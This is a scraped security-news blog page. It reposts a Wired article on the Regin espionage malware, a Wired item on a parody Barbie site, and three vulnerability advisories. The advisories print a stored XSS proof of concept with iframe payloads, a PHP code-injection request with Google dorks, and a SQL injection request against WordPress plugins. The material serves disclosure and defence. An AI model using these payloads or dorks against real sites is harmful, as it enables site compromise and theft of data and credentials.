MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

24Nov/140

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

It was the spring of 2011 when the European Commission discovered it had been hacked. The intrusion into the EU’s legislative body was sophisticated and widespread and used a zero-day exploit to get in. Once the attackers established a stronghold on the network, they were in for the long haul. They scouted the network architecture for additional victims and covered their tracks well. Eventually, they infected numerous systems belonging to the European Commission and the European Council before being discovered.

Two years later another big target was hacked. This time it was Belgacom, the partly state-owned Belgian telecom. In this case, too, the attack was sophisticated and complex. According to published news reports and documents leaked by Edward Snowden, the attackers targeted system administrators working for Belgacom and used their credentials to gain access to routers controlling the telecom’s cellular network. Belgacom publicly acknowledged the hack, but has never provided details about the breach.

Then five months after that announcement, news of another high-profile breach emerged—this one another sophisticated hack targeting prominent Belgian cryptographer Jean-Jacques Quisquater.

Now it appears that security researchers have found the massive digital spy tool used in all three attacks. Dubbed “Regin” by Microsoft, more than a hundred victims have been found to date, but there are likely many others still unknown. That’s because the espionage tool—a malicious platform capable of taking over entire networks and infrastructures—has been around since at least 2008, possibly even earlier, and is built to remain stealth on a system for years.

The threat has been known since at least 2011, around the time the EU was hacked and some of the attack files made their way to Microsoft, who added detection for the component to its security software. Researchers with Kaspersky Lab only began tracking the threat in 2012, collecting bits and pieces of the massive threat. Symantec began investigating it in 2013 after some of its customers were infected. Putting together information from each, it’s clear the platform is highly complex and modulated and can be customized with a wide range of capabilities depending on the target and the attackers’ needs. Researchers have found 50 payloads so far for stealing files and other data, but have evidence that still more exist.

“It’s a threat that everyone has detected for some time, but no one has exposed [until now],” says Eric Chien, technical director of Symantec’s Security Technology and Response division.

The Most Sophisticated Spy Tool Yet

The researchers have no doubt that Regin is a nation-state tool and are calling it the most sophisticated espionage machine uncovered to date—more complex even than the massive Flame platform, uncovered by Kaspersky and Symantec in 2012 and crafted by the same team who created Stuxnet.

“In the world of malware threats, only a few rare examples can truly be considered groundbreaking and almost peerless,” writes Symantec in its report about Regin.

Though no one is willing to speculate on the record about Regin’s source, news reports about the Belgacom and Quisquater hacks pointed a finger at GCHQ and the NSA. Kaspersky confirms that Quisqater was infected with Regin, and other researchers familiar with the Belgacom attack have told WIRED that the description of Regin fits the malware that targeted the telecom, though the malicious files used in that attack were given a different name, based on something investigators found inside the platform’s main file.

Victims are located in multiple countries. Kaspersky has found them in Algeria, Afghanistan, Belgium, Brazil, Fiji, Germany, Iran, India, Malaysia, Syria, Pakistan, Russia and the small Pacific island nation of Kiribati. The majority of victims Symantec has tracked are located in Russia and Saudi Arabia.

Targets include entire networks, not just individuals, among them telecoms in multiple countries, as well as government agencies, research institutes and academics (particularly those doing advanced mathematics and cryptography, like Quisquater). Symantec has also found hotels infected. These are likely targeted for their reservation systems, which can provide valuable intelligence about visiting guests.

But perhaps the most significant aspect of Regin is its ability to target GSM base stations of cellular networks. The malicious arsenal includes a payload that Kaspersky says was used in 2008 to steal the usernames and passwords of system administrators of a telecom somewhere in the Middle East. Armed with these credentials, the attackers would have been able to access GSM base station controllers—the part of a cellular network that controls transceiver stations—to manipulate the systems or even install malicious code to monitor cellular traffic. They could also conceivably have shut down the cellular network—for example, during an invasion of the country or other unrest.

Kaspersky won’t identify the telecom or country where this GSM attack hack occurred, but suggests it’s either Afghanistan, Iran, Syria or Pakistan, as out of Kaspersky’s list of countries with Regin infections, only these four are in the region popularly considered the Middle East. Afghanistan stands out among the four, having been the only one cited in recent news stories about government hacking of GSM networks. Although most authorities would place it in South Asia, it is often popularly identified as being part of the Middle East.

Earlier this year, news reports based on documents leaked by Edward Snowden revealed two NSA operations codenamed MYSTIC and SOMALGET that involved hijacking the mobile network of several countries to collect metadata on every mobile call to and from these nations and, in at least two countries, to covertly record and store the full audio of calls. The countries where metadata was collected were identified as Mexico, Kenya, the Philippines and the island nation of the Bahamas. Countries where full audio was being recorded were identified as the Bahamas and Afghanistan.
The Path to Discovery

The Regin platform made its first public appearance in 2009 when someone uploaded components of the tool to the VirusTotal web site. VirusTotal is a free web site that aggregates dozens of anti-virus scanners. Researchers, and anyone else who finds a suspicious file on their system, can upload the file to the site to see if the scanners consider it malicious.

No one apparently noticed this upload in 2009, however. It wasn’t until March 9, 2011 that Microsoft appeared to take note, around the time that more files were uploaded to VirusTotal, and announced that the company had added detection for a trojan called Regin.A to its security software. The following day, it made the same announcement about a variant called Regin.B. Some in the security community believe the files uploaded to VirusTotal in 2011 might have come from the European Commission or from a security firm hired to investigate its breach.

Guido Vervaet, the EU Commission’s director of security who helped investigate the breach, wouldn’t discuss it other than to say it was “quite” extensive and very sophisticated, with a “complex architecture.” He says the attackers used a zero-day exploit to get in but wouldn’t say what vulnerability they attacked. The attack was uncovered by system administrators only when systems began malfunctioning. Asked if the attackers used the same malware that struck Belgacom, Vervaet couldn’t say for sure. “It was not one piece of software; it was an architecture [that] was not just one component but a series of elements working together. We have analyzed the architecture of the attack, which was quite sophisticated and similar to other cases that we know of in other organizations” but internally they were unable to come to any conclusion “that it was the same attack or the same wrongdoers.”

Vervaet wouldn’t say when the intrusion began or how long the invaders had been in the EU network, but documents released by Snowden last year discussed NSA operations that had targeted the EU Commission and Council. Those documents were dated 2010.

There are currently two known versions of the Regin platform in the wild. Version 1.0 dates back to at least 2008 but disappeared in 2011 the same year Microsoft released signatures to detect its trojan. Version 2.0 popped up in 2013, though it may have been used earlier than this. Researchers have found some Regin files with timestamps dating to 2003 and 2006, though it’s not clear if the timestamps are accurate.

Liam O’Murchu, senior manager in Symantec’s threat response group, says the threat landscape in 2008 was much different than it is today and this likely contributed to Regin remaining stealth for so long. “I don’t think we realized attackers were working on this level until we saw things like Stuxnet and Duqu and we realized they’d been on this level for quite some time.” Those discoveries prompted researchers to begin looking for threats in different ways.

It’s unclear how the first infections occur. Neither Symantec nor Kaspersky has uncovered a dropper component (a phishing email containing an exploit that drops the malware onto a machine or entices victims to click on a malicious link), but based on evidence in one attack from 2011, Symantec thinks the attackers might have used a zero-day vulnerability in Yahoo Instant Messenger. But Chien says the attackers probably used multiple techniques to get into different environments. Reports about the hack of Belgacom describe a more sophisticated man-in-the-middle technique that involved using a rogue server to hijack the browser of Belgacom system administrators and redirect them to web pages the attackers controlled that infected their machines with malware.

Regardless of how it first gets into a machine, the Regin attack unfolds in five stages. Stages one through three load the attack and configure its architecture, while stages four and five launch the payloads. Among the payload options are a remote access trojan that gives the attackers backdoor access to infected systems, a keystroke logger and clip board sniffer, a password sniffer, modules to collect information about USB devices connected to the infected system, and an email extraction module called U_STARBUCKS. Regin can also scan for deleted files and retrieve them.

The execution of components is orchestrated by an elaborate component that researchers have dubbed the “conductor.” This is “the brain of the whole platform,” says Costin Raiu, head of Kaspersky’s Global Research and Analysis Team.

Regin uses a nested decrypting technique, decrypting itself in stages, with the key for decrypting each component in the component that precedes it. This made it difficult for researchers to examine the threat in the beginning when they didn’t have all of the components and all of the keys.

Regin also uses an unusual technique in some cases to hide its data, by storing it in the Extended Attributes portion of Windows. Extended Attributes is a storage area for metadata associated with files and directories, such as when a file was created or last altered or whether an executable program was downloaded from the internet (and therefore needs a prompt warning users before opening). Extended Attributes limits the size of data blocks it can store, so Regin splits the data it wants to store into separate encrypted chunks to hide them. When it needs to use this data, the conductor links the chunks together so they can execute like a single file.

The attackers also use a complex communication structure to manage the large scope of network-wide infections. Instead of communicating directly with the attackers’ command servers, each system talks only to other machines on the network and with a single node that acts as a hub to communicate with command servers. This reduces the amount of traffic leaving the network and the number of machines communicating with a strange server outside the network, which can draw suspicion. It also allows the attackers to communicate with systems inside the organization that might not even be connected to the internet.
‘It’s Totally Crazy': The Middle-Eastern Hacks

The most elaborate and extensive infection Kaspersky saw that used this technique occurred in a Middle Eastern country the researchers decline to name. They call the infection “mind-blowing” and say in their report that it consisted of an elaborate web of networks the attackers infected and then linked together. These include networks for the office of the president of the country, a research center, an educational institute that from its name appears to be a mathematics institute, and a bank. In this case, instead of having each of the infected networks communicate with the attackers’s command server individually, the attackers set up an elaborate covert communication web between them so that commands and information passed between them as if through a peer-to-peer network. All of the infected networks then interfaced with one system at the educational institute, which served as a hub for communicating with the attackers.

“It’s totally crazy,” says Raiu.”The idea is to have one single control mechanism for the whole country so they can just run one command, and that command is replicated between all the members on the peer-to-peer network.”

The connections between infected machines and networks are encrypted, with each infected node using a public and private key to encrypt traffic exchanged between them.

Kaspersky refers to the educational institute as the “Magnet of Threats” because they found all sorts of other advanced threats infesting its network—including the well-known Mask malware and Turla—all co-existing peacefully with Regin.

But on par with this attack was one that occurred in another Middle East country against the GSM network of a large, unidentified telecom. The Kaspersky researchers say they found what appears to be an activity log the attackers used to collect commands and login credentials for one of the telecom’s GSM base station controllers. The log, about 70 KB in size, contains hundreds of commands sent to the base station controller between April 25 and May 27 of 2008. It’s unclear how many of the commands were sent by telecom administrators or by the attackers themselves in an attempt to control base stations.

The commands, which Kaspersky identified as Ericsson OSS MML commands, are used for checking the software version on a base station controller, retrieving a list of the call forwarding settings for the mobile station, enabling call forwarding, listing the transceiver route for a particular cell tower, activating and deactivating cell towers in the GSM network, and adding frequencies to the active list of frequencies used by the network. The log shows commands going to 136 different GSM cell sites—cell sites with names like prn021a, gzn010a, wdk004, and kbl027a. In addition to commands, the log also shows usernames and passwords for the telecom’s engineer accounts.

“They found a computer that manages a base station controller, and that base station controller is able to reach out to hundreds of cells,” says Raiu. He says there are two or three GSM operators in the targeted country and the one the attackers targeted is the largest. He doesn’t know if the others were infected as well.

Both of these infections—targeting the GSM network and the presidential network—appear to be ongoing. As news of the Regin attack spreads and more security firms add detection for it to their tools, the number of victims uncovered will no doubt grow.

http://www.wired.com/2014/11/mysteries-of-the-malware-regin/

(2)

23Nov/140

Feminist Hacker Barbie Is Just What Our Little Girls Need

Feminist Hacker Barbie Is Just What Our Little Girls Need

There’s an illustrated book called “Barbie: I Can be a Computer Engineer,” and everyone we know hated it.

Packed with “Over 50 Stickers!,” it dreams up a computer engineering version of Barbie who seems better at taking praise for other people’s work than doing any actual coding. It prompted some serious outrage on the net this week because Barbie the computer engineer says things like “I’m only creating the design ideas” and “I’ll need Steven’s and Brian’s help to turn it into a game.” She also infects her sister’s computer, leans on these two guy friends to fix the problem, and then takes credit for their work. Bad Barbie!

Says blogger Pamela Ribon: “It’s a perfect example of the way women and girls are perceived to ‘understand’ the tech world, and how frustrating it can be when nobody believes this is how we’re treated.”

But the internet has fallen in love with Feminist Hacker Barbie. She’s the brainchild of Kathleen Tuite, an independent computer programmer based near Santa Cruz, California, who spent a half-day this week putting together a website where people could re-caption the original book, hacking it to fix all of its pastel-hued problems.

Tuite, who until recently was a University of Washington graduate student studying crowdsourcing, says she created the site out of disappointment and frustration with the official Barbie book. In the past few days, her Feminist Hacker Barbie has blossomed into a full-blown and extremely funny internet meme with thousands of captions, many of which we think would make great fodder for a real Barbie engineering movie.

These captions work so well because of the sheer ridiculousness of the original Barbie images. In one of them, Barbie inexplicably sits in front of three computers, her hand on two different machines simultaneously. About 2,700 of the caption were uploaded to Tuite’s website—and then someone discovered a bug in the Django code Tuite used to build the site. In short order, Feminist Hacker Barbie got hacked.

At first, someone started uploading photos of Free Software Foundation advocate Richard Stallman. After that, came the porn. So Tuite pulled the plug on the uploads, but folks are free to create their own images and captions. And those have been popping up all over Twitter and Facebook for the past few days.

Tuite’s favorite so far is a picture from the book that includes a sample of the buggy code from her website—a sort of meta-cartoon, written as though Computer Engineer Barbie herself had unearthed the offending vulnerability.

Fonte: http://www.wired.com/2014/11/feminist-hacker-barbie-just-little-girls-need/
(38)

23Nov/140

Supr Shopsystem 5.1.0 Cross Site Scripting

Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
 
Release Date:
=============
2014-11-07
 
Vulnerability Laboratory ID (VL-ID):
====================================
1353
 
Common Vulnerability Scoring System:
====================================
3.1
 
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store. 
Without installation and own webspace you can begin to create products and content right after the registration. With our 
free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an 
expert to work with the SUPR Shop.
 
( Copy of the Vendor Homepage: http://de.supr.com/tour )
 
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
 
 
Vulnerability Disclosure Timeline:
==================================
2014-11-05:  Public Disclosure (Vulnerability Laboratory)
 
Discovery Status:
=================
Published
 
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
 
Exploitation Technique:
=======================
Remote
 
Severity Level:
===============
Medium
 
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non expired session or by local post inject.
 
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link). 
Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail 
POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded.
 
The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
 
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context.
 
Request Method(s):
          [+] POST
 
Vulnerable Module(s):
          [+] Dashboard > Settings > General > (setting_shopdetail)
 
Vulnerable Parameter(s):
          [+] blogname
          [+] blog/shop slogan
          [+] tags
 
Affected Module(s):
          [+] Dashboard (localhost:80/a/wp-admin/[x])
 
 
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
 
PoC: Dashboard > Settings > General > (setting_shopdetail)
 
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
                                <div class="form-row field-error">
                    <div class="label">
                        <label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
                    </div>
                    <div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
 
<ul class="">
    <li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
</ul></div>
 
Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
 
 
--- PoC Session Logs [POST] ---
Status: 200[OK]
 POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
      Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3; 
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1; 
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; 
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
 _ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1; 
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
 __utmb=182188197.24.10.1414786850]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   POST-Daten:
      setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
      setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      shopreg%5Bshoplang%5D[de_DE]
      setting_shopdata%5Bshoplang%5D[de_DE]
      setting_shopdata%5Bshopcategory%5D[]
      setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      setting_shopdata%5Bemailfooter%5D[]
      setting_shopdata%5Binvoicenote%5D[]
      setting_shopdata%5Bshop_google_analytics_account%5D[]
      setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
      setting_shopdata%5Bsubmit%5D[save]
   Response Header:
      Date[Fri, 31 Oct 2014 20:25:22 GMT]
      Server[Apache/2.2.16 (Debian)]
      X-Powered-By[PHP/5.3.3-7+squeeze22]
      p3p[CP="CAO PSA OUR"]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
      Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Connection[close]
      Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK] 
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!] 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[283] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
      Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
 __utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
 wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; 
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
 _ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
 __utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Date[Fri, 31 Oct 2014 20:25:24 GMT]
      Server[Apache/2.2.16 (Debian)]
      Content-Length[283]
      Keep-Alive[timeout=5, max=8]
      Connection[Keep-Alive]
      Content-Type[text/html; charset=iso-8859-1]
 
 
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
 
 
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable setting_shopdetail values in the input POST method request.
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
 
 
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
 
 
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
 
 
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.
 
Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/
 
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
 
        Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
 
 
 
 
-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
 
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

(20)

22Nov/140

WordPress CM Download Manager 2.0.0 Code Injection

Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
CVE: CVE-2014-8877 
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and previous version
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Phi Le Ngoc - phi.n.le@itas.vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRITION::
 
The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment. 
 
GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php
Vulnerable code: (Line: 130 -> 158)
 
 
public static function alterSearchQuery($search, $query)
    {
        if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
        {
            global $wpdb;
            $search_term = $_GET['CMDsearch'];
            if( !empty($search_term) )
            {
                $search = '';
                $query->is_search = true;
                // added slashes screw with quote grouping when done early, so done later
                $search_term = stripslashes($search_term);
                preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
                $terms = array_map('_search_terms_tidy', $matches[0]);
 
                $n = '%';
                $searchand = ' AND ';
                foreach((array) $terms as $term)
                {
                    $term = esc_sql(like_escape($term));
                    $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
                }
                add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
                remove_filter('posts_request', 'relevanssi_prevent_default_request');
                remove_filter('the_posts', 'relevanssi_query');
            }
        }
        return $search;
}
 
::SOLUTION::
Update to version 2.0.4
 
::DISCLOSURE::
2014-11-08 initial vendor contact
2014-11-10 vendor response
2014-11-10 vendor confirmed 
2014-11-11 vendor release patch
2014-11-14 public disclosure
 
::REFERENCE::
https://downloadsmanager.cminds.com/release-notes/
http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en
 
 
::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP.
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

(71)

22Nov/140

WordPress SP Client Document Manager 2.4.1 SQL Injection

Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRITION::
 
Multiple SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from SQL injection: 
 
Link 1:
 
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
vendor_email[]=<SQL Injection>
 
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)
    function email_vendor()
    {
        global $wpdb, $current_user;
        if (count($_POST['vendor_email']) == 0) {
            echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
        } else {
            $files = implode(",", $_POST['vendor_email']);
